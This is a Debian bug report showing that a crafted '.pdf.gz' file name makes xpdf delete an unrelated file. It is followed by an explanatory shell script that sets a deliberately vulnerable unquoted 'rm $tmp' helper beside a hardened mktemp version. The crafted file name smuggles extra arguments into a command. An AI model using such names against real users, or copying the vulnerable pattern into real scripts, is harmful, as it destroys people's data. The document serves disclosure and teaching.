Package: xpdf
Version: 3.02-18
Severity: critical
Justification: causes serious data loss

Using a crafted .pdf.gz file name (which could be sent from a Web server to a browser, for example), xpdf can be fooled into deleting an unrelated file as long as its name is a single letter.

$ touch y                                    # The unrelated victim file
$ gzip -c </dev/null >'" y ".pdf.gz'         # Create a .pdf.gz file
$ xpdf '" y ".pdf.gz'                        # View it using xpdf
Error: May not be a PDF file (continuing anyway)
Error: PDF file is damaged - attempting to reconstruct xref table...
Error: Couldn't find trailer dictionary
Error: Couldn't read xref table
rm: cannot remove `/tmp/': Is a directory
$ ls -l y                                    # The victim file is gone!
ls: cannot access y: No such file or directory

Thanks,
Ken

-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.39 (SMP w/4 CPU cores)
Locale: LANG=zh_TW.UTF-8, LC_CTYPE=zh_TW.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages xpdf depends on:
ii  lesstif2      1:0.95.2-1  OSF/Motif 2.1 implementation relea
ii  libc6         2.13-11     Embedded GNU C Library: Shared lib
ii  libgcc1       1:4.6.1-5   GCC support library
ii  libpoppler13  0.16.7-2    PDF rendering library
ii  libstdc++6    4.6.1-5     GNU Standard C++ Library v3
ii  libx11-6      2:1.4.3-3   X11 client-side library
ii  libxt6        1:1.1.1-2   X11 toolkit intrinsics library

Versions of packages xpdf recommends:
ii  gsfonts-x11   0.22        Make Ghostscript fonts available t
ii  poppler-data  0.4.4-1     Encoding data for the poppler PDF
ii  poppler-utils 0.16.7-2    PDF utilities (based on Poppler)

xpdf suggests no packages.

-- no debconf information

-- 
Edit this signature at http://www.digitas.harvard.edu/cgi-bin/ken/sig
I'll let a train be my feet if it's too far to walk to you
Train don't go there, I'll get a jet or a bus, I'm gonna find you
You're mine and I know that I'll find you
And my head is my only house unless it rains
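The report above shows the symptom (an unrelated file named y disappears, and rm complains about a path fragment) but not the wrapper code that caused it. The script below is an added illustration of the bug class, not the xpdf package's own wrapper: the function names, the scratch-path scheme (a temporary copy named after the untrusted input) and the cleanup command are assumptions chosen to show how an unquoted expansion of an attacker-controlled file name turns "rm scratch-file" into "rm <fragment> y <fragment>". The exact rm message in the report implies the real wrapper built its path somewhat differently; the mechanism (field splitting of an unquoted variable) is the same. It reproduces the reporter's three steps against both a vulnerable and a hardened helper in a throwaway directory.

```shell
#!/bin/sh
# Added illustration of the bug class in the xpdf report above. NOT the
# Debian xpdf wrapper script: function names, scratch-path scheme and the
# cleanup command are assumptions made for the demonstration.
set -u

# Vulnerable shape: scratch path derived from the untrusted name, cleanup
# done with an unquoted expansion.
# $1 = scratch directory, $2 = .pdf.gz file name chosen by the attacker
view_gz_vulnerable() {
    dir=$1; f=$2
    # '" y ".pdf.gz' -> '<dir>/" y ".pdf' (spaces and quotes survive, they
    # are just ordinary characters in a file name)
    tmp=$dir/$(basename "$f" .gz)
    gzip -dc "$f" >"$tmp"
    # ... the viewer would run on "$tmp" here ...
    # BUG: $tmp is unquoted, so field splitting hands rm three operands:
    #   '<dir>/"'   'y'   '".pdf'
    # The first and last do not exist; the middle one is the victim file.
    rm $tmp 2>/dev/null
}

# Hardened shape: scratch name chosen by mktemp (independent of the input
# name), every expansion quoted, '--' so a leading '-' cannot become an option.
view_gz_fixed() {
    dir=$1; f=$2
    tmp=$(mktemp "$dir/view.XXXXXX") || return 1
    gzip -dc -- "$f" >"$tmp" || { rm -f -- "$tmp"; return 1; }
    # ... the viewer would run on "$tmp" here ...
    rm -f -- "$tmp"
}

# Replays the report's steps against one of the helpers above in a fresh
# directory (all inputs constructed here). Returns 0 if the unrelated file
# 'y' survived, 1 if it was deleted.
run_case() {
    fn=$1
    work=$(mktemp -d) || return 2
    (
        cd "$work" || exit 2
        touch y                                    # the unrelated victim file
        gzip -c </dev/null >'" y ".pdf.gz'         # constructed malicious name
        "$fn" "$work" '" y ".pdf.gz' || true
        [ -e y ]
    )
    rc=$?
    rm -rf -- "$work"
    return $rc
}

if run_case view_gz_vulnerable; then
    echo "view_gz_vulnerable: y survived (unexpected)"
else
    echo "view_gz_vulnerable: y was deleted"
fi
if run_case view_gz_fixed; then
    echo "view_gz_fixed: y survived"
else
    echo "view_gz_fixed: y was deleted (unexpected)"
fi
```

The check a maintainer would want before shipping a wrapper like this is mechanical: ShellCheck reports the unquoted `rm $tmp` as SC2086 ("Double quote to prevent globbing and word splitting"), and a temp file named by mktemp rather than by the input removes the attacker's control over the path entirely, so quoting is belt and braces rather than the only defence.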